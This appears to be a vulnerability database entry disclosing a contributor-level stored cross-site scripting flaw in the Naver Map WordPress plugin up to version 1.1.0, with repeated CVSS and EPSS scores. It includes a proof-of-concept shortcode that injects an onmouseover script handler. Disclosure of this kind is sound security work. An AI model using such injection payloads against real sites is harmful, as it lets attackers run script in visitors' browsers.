Lucene search

K
wpexploitLana CodesWPEX-ID:D1218C69-4F6A-4B2D-A537-5CC16A46BA7B
HistoryJan 11, 2023 - 12:00 a.m.

Naver Map <= 1.1.0 - Contributor+ Stored XSS

2023-01-1100:00:00
Lana Codes
47

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.0004 Low

EPSS

Percentile

12.0%

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

[naver-map y='" onmouseover="alert(1)" style="background:red;width:100px;height:100px;"']

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

0.0004 Low

EPSS

Percentile

12.0%

Related for WPEX-ID:D1218C69-4F6A-4B2D-A537-5CC16A46BA7B